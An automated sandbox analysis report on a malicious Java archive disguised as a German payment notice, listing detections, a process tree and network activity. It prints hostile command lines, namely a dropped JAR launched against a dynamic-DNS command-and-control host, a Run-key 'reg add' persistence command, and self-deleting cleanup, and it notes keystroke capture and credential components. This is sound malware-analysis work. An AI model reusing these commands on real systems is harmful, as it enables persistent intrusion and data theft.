Edit tour

Windows Analysis Report
Avisierung vom 03.04.2025 Kundennummer 1084472.jar

Overview

General Information

Sample name:Avisierung vom 03.04.2025 Kundennummer 1084472.jar
Analysis ID:1656232
MD5:5b6cee019a5bcd56303094bb15787aac
SHA1:dfe538f5dcd7910b86f50eadd502810d2a6bddab
SHA256:a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd
Tags:jaruser-JAMESWT_WT
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Register Jar In Run Key
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Joe Sandbox ML detected suspicious sample
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected AllatoriJARObfuscator
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Shell Process Spawned by Java.EXE
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 7za.exe (PID: 7636 cmdline: 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • java.exe (PID: 7728 cmdline: java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 7816 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 5540 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5548 cmdline: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7448 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 5840 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 4692 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • java.exe (PID: 2964 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 4860 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5560 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 8000 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • cmd.exe (PID: 5868 cmdline: cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 6892 cmdline: ping localhost -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Avisierung vom 03.04.2025 Kundennummer 1084472.jarJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jarJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
      C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jarJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
        C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jarJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
          C:\Users\user\AppData\Local\Temp\lib\paexec.exetool_paexec_stringsDetects PAExec based on stringsSekoia.io
          • 0x2a7a0:$: \\%s\%s\PAExec_Move%u.dat
          • 0x2a7b0:$: PAExec_Move%u.dat
          • 0x2a7d6:$: PAExec_Move%u.dat
          • 0x28a4c:$: PAExec returning exit code %d
          SourceRuleDescriptionAuthorStrings
          00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
            00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
              00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
                00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
                  00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
                    Click to see the 30 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5548, ParentProcessName: cmd.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", ProcessId: 7448, ProcessName: reg.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "", ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 5540, ParentProcessName: java.exe, ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", ProcessId: 5548, ProcessName: cmd.exe
                    Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: Data: Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "", ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 5540, ParentProcessName: java.exe, ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", ProcessId: 5548, ProcessName: cmd.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 "", ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 5540, ParentProcessName: java.exe, ProcessCommandLine: cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\"", ProcessId: 5548, ProcessName: cmd.exe
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Submited SampleNeural Call Log Analysis: 85.3%
                    Source: Binary string: D:\GitHub\PAExec\Release\PAExec.pdb source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\System32\conhost.exe
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 4x nop then cmp eax, dword ptr [ecx+04h]

                    Networking

                    barindex
                    Source: unknownDNS query: name: jegjav.duckdns.org
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: global trafficTCP traffic: 192.168.2.4:49716 -> 128.90.145.126:1967
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: PHMGMT-AS1US PHMGMT-AS1US
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Connection: close
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Connection: close
                    Source: global trafficDNS traffic detected: DNS query: jegjav.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
                    Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                    Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                    Source: java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1368038319.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000017.00000002.2304286299.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
                    Source: java.exe, 00000003.00000003.1566322429.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2475357557.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363389065.0000000014F84000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363515756.0000000014F8B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363630443.0000000014F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: Avisierung vom 03.04.2025 Kundennummer 1084472.jar.12.drString found in binary or memory: http://www.allatori.com
                    Source: java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.com#
                    Source: 7za.exe, 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.comdlly
                    Source: java.exe, 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.como
                    Source: java.exe, 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.comu
                    Source: jna-platform-5.5.0.jar.3.drString found in binary or memory: http://www.apache.org/licenses/
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: java.exe, 00000003.00000003.1537919401.0000000015637000.00000004.00000020.00020000.00000000.sdmp, jna-platform-5.5.0.jar.3.drString found in binary or memory: http://www.gnu.org/licenses/licenses.html
                    Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.poweradmin.com0
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641019A0 lstrcmpA,RegisterRawInputDevices,GetKeyboardState,GetRawInputData,malloc,GetRawInputData,free,free,free,PostQuitMessage,DefWindowProcA,
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641019A0 lstrcmpA,RegisterRawInputDevices,GetKeyboardState,GetRawInputData,malloc,GetRawInputData,free,free,free,PostQuitMessage,DefWindowProcA,

                    System Summary

                    barindex
                    Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
